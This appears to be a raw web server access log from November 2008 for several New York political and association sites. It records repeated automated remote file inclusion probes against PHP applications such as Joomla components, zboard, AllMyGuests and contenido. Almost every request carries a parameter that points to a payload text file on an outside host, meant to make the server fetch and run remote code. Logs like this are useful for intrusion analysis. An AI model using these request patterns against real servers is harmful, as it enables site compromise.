203.116.63.71 - - [19/Nov/2008:04:00:33 -0800] "GET /logs//include/write.php?dir=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
203.116.63.71 - - [19/Nov/2008:04:00:33 -0800] "GET /include/write.php?dir=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:00:36 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:00:36 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:00:40 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:00:51 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:00:51 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:00:52 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
203.116.63.71 - - [19/Nov/2008:04:01:07 -0800] "GET /logs//include/write.php?dir=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:01:08 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
203.116.63.71 - - [19/Nov/2008:04:01:08 -0800] "GET /include/write.php?dir=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:01:09 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:01:09 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:01:15 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:01:16 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:01:21 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "nyassemblygop.org"
218.234.23.56 - - [19/Nov/2008:04:02:12 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
218.234.23.56 - - [19/Nov/2008:04:02:12 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
218.234.23.56 - - [19/Nov/2008:04:02:12 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
194.85.91.184 - - [19/Nov/2008:04:03:33 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
124.0.210.117 - - [19/Nov/2008:04:06:02 -0800] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
124.0.210.117 - - [19/Nov/2008:04:06:03 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
218.38.12.47 - - [19/Nov/2008:04:06:32 -0800] "GET /logs/access.log%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
124.0.210.117 - - [19/Nov/2008:04:07:48 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
124.0.210.117 - - [19/Nov/2008:04:07:48 -0800] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
124.0.210.117 - - [19/Nov/2008:04:07:49 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
203.116.63.71 - - [19/Nov/2008:04:08:00 -0800] "GET /logs/access_080929.log//include/write.php?dir=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
203.116.63.71 - - [19/Nov/2008:04:08:02 -0800] "GET /logs//include/write.php?dir=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:04:09:02 -0800] "GET /bbs/zboard.php?id=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
218.234.23.56 - - [19/Nov/2008:04:09:06 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
218.234.23.56 - - [19/Nov/2008:04:09:06 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
218.234.23.56 - - [19/Nov/2008:04:09:06 -0800] "GET /logs/access_081021.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
218.38.12.47 - - [19/Nov/2008:04:09:12 -0800] "GET /logs/access_081021.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
218.38.12.47 - - [19/Nov/2008:04:09:15 -0800] "GET /logs/access_081021.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
218.38.12.47 - - [19/Nov/2008:04:09:15 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
218.38.12.47 - - [19/Nov/2008:04:09:15 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:09:29 -0800] "GET /bbs/zboard.php?id=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
66.232.97.32 - - [19/Nov/2008:04:10:16 -0800] "GET /Contact.html HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "nyassemblygop.org"
213.239.141.72 - - [19/Nov/2008:04:10:39 -0800] "GET /bbs/zboard.php?id=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
118.101.42.193 - - [19/Nov/2008:04:11:33 -0800] "GET /?path%5Bdocroot%5D=http://bixmedia.net/idd.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.nysracc.com"
218.234.23.56 - - [19/Nov/2008:04:11:44 -0800] "GET /logs/access_080911.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
218.38.12.47 - - [19/Nov/2008:04:11:53 -0800] "GET /logs/access_080911.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
218.234.23.56 - - [19/Nov/2008:04:11:55 -0800] "GET /logs/access_080911.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
218.38.12.47 - - [19/Nov/2008:04:12:10 -0800] "GET /logs/access_080911.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
218.38.12.47 - - [19/Nov/2008:04:12:15 -0800] "GET /logs/access_080918.log%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
218.38.12.47 - - [19/Nov/2008:04:12:30 -0800] "GET /logs/access_080918.log%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
203.116.63.71 - - [19/Nov/2008:04:13:26 -0800] "GET /logs/access_080920.log//include/write.php?dir=http://www.jazzpeople.co.kr/downloadfile/Kamtiezid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:15:26 -0800] "GET /logs/access.log//bbs/zboard.php?id=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:15:27 -0800] "GET /bbs/zboard.php?id=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:15:27 -0800] "GET /logs//bbs/zboard.php?id=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:15:54 -0800] "GET /logs/access.log//bbs/zboard.php?id=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:15:54 -0800] "GET /bbs/zboard.php?id=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:15:54 -0800] "GET /logs//bbs/zboard.php?id=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:15:54 -0800] "GET /logs/access.log//bbs/zboard.php?id=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:15:55 -0800] "GET /bbs/zboard.php?id=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:15:55 -0800] "GET /logs//bbs/zboard.php?id=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
218.234.23.56 - - [19/Nov/2008:04:16:22 -0800] "GET /logs/access_080918.log%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:16:22 -0800] "GET /logs/access.log//bbs/zboard.php?id=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:16:22 -0800] "GET /bbs/zboard.php?id=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:16:23 -0800] "GET /logs//bbs/zboard.php?id=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
218.234.23.56 - - [19/Nov/2008:04:16:34 -0800] "GET /logs/access_080918.log%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
75.145.110.100 - - [19/Nov/2008:04:17:30 -0800] "GET /components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.nyassemblygop.org"
75.145.110.100 - - [19/Nov/2008:04:17:30 -0800] "GET /logs//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.nyassemblygop.org"
75.145.110.100 - - [19/Nov/2008:04:17:30 -0800] "GET /logs/access_080929.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.nyassemblygop.org"
118.101.42.193 - - [19/Nov/2008:04:17:39 -0800] "GET /?path%5Bdocroot%5D=http://bixmedia.net/idd.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
75.145.110.100 - - [19/Nov/2008:04:18:21 -0800] "GET /logs/access.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:18:48 -0800] "GET /logs/access.log//bbs/zboard.php?id=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:18:48 -0800] "GET /bbs/zboard.php?id=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:18:48 -0800] "GET /logs//bbs/zboard.php?id=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
217.111.67.5 - - [19/Nov/2008:04:19:29 -0800] "GET /components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
217.111.67.5 - - [19/Nov/2008:04:19:29 -0800] "GET /logs/access_080929.log%20//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
217.111.67.5 - - [19/Nov/2008:04:19:29 -0800] "GET /logs//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
87.106.16.18 - - [19/Nov/2008:04:19:39 -0800] "GET /logs//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
87.106.16.18 - - [19/Nov/2008:04:19:39 -0800] "GET /logs/access_080929.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
87.106.16.18 - - [19/Nov/2008:04:19:39 -0800] "GET /components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
87.106.16.18 - - [19/Nov/2008:04:20:15 -0800] "GET /logs/access.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
217.111.67.5 - - [19/Nov/2008:04:21:19 -0800] "GET /logs/access_080929.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
118.101.42.193 - - [19/Nov/2008:04:22:37 -0800] "GET /logs/access_080929.log//?path%5Bdocroot%5D=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
217.111.67.5 - - [19/Nov/2008:04:22:53 -0800] "GET /logs/access_081021.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:04:23:15 -0800] "GET /errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
89.218.85.18 - - [19/Nov/2008:04:23:16 -0800] "GET /logs/errors.php?error=http://genthonx.gardenbattle.com/iku/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
75.145.110.100 - - [19/Nov/2008:04:27:19 -0800] "GET /logs/access_080929.log%20//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.nyassemblygop.org"
66.40.52.28 - - [19/Nov/2008:04:28:02 -0800] "GET /logs//inc/cmses/aedating4CMS.php?dir%5binc%5d=http://notestein.com/mambo/images/index.html?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.nysracc.com"
66.40.52.28 - - [19/Nov/2008:04:28:02 -0800] "GET /inc/cmses/aedating4CMS.php?dir%5binc%5d=http://notestein.com/mambo/images/index.html?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.nysracc.com"
218.234.23.56 - - [19/Nov/2008:04:30:30 -0800] "GET /logs/access_081021.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
218.234.23.56 - - [19/Nov/2008:04:30:31 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
218.234.23.56 - - [19/Nov/2008:04:30:32 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
87.106.16.18 - - [19/Nov/2008:04:31:48 -0800] "GET /logs/access_080929.log%20//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.spidergenie.com//config/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
118.101.42.193 - - [19/Nov/2008:04:32:00 -0800] "GET /logs/access_080929.log//?path%5Bdocroot%5D=http://bixmedia.net/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
72.232.184.234 - - [19/Nov/2008:04:33:21 -0800] "GET /logs/access_080922.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geocities.com/blade_tea/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
72.232.184.234 - - [19/Nov/2008:04:33:21 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geocities.com/blade_tea/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
72.232.184.234 - - [19/Nov/2008:04:33:21 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geocities.com/blade_tea/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
74.7.219.93 - - [19/Nov/2008:04:33:54 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
66.40.52.28 - - [19/Nov/2008:04:34:03 -0800] "GET /inc/cmses/aedating4CMS.php?dir%5binc%5d=http://notestein.com/mambo/images/index.html?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.nyassemblygop.org"
66.40.52.28 - - [19/Nov/2008:04:34:03 -0800] "GET /logs//inc/cmses/aedating4CMS.php?dir%5binc%5d=http://notestein.com/mambo/images/index.html?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.nyassemblygop.org"
66.40.52.28 - - [19/Nov/2008:04:34:22 -0800] "GET /inc/cmses/aedating4CMS.php?dir%5binc%5d=http://notestein.com/mambo/images/index.html?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "nyassemblygop.org"
121.78.225.23 - - [19/Nov/2008:04:35:50 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.nyassemblygop.org"
74.7.219.93 - - [19/Nov/2008:04:36:03 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
74.7.219.93 - - [19/Nov/2008:04:36:04 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
74.7.219.93 - - [19/Nov/2008:04:36:04 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:04:36:26 -0800] "GET /logs/access_080920.log/language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:04:36:26 -0800] "GET /language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:04:36:26 -0800] "GET /logs/access_080922.log/language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:04:36:26 -0800] "GET /logs/language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:04:36:27 -0800] "GET /language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:04:36:27 -0800] "GET /logs/access_080920.log/language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:04:36:27 -0800] "GET /logs/language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
153.19.91.131 - - [19/Nov/2008:04:36:28 -0800] "GET /logs/access_080922.log/language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
193.51.8.19 - - [19/Nov/2008:04:36:30 -0800] "GET /language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
193.51.8.19 - - [19/Nov/2008:04:36:30 -0800] "GET /logs/access_080920.log/language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
193.51.8.19 - - [19/Nov/2008:04:36:30 -0800] "GET /logs/language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
193.51.8.19 - - [19/Nov/2008:04:36:31 -0800] "GET /language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
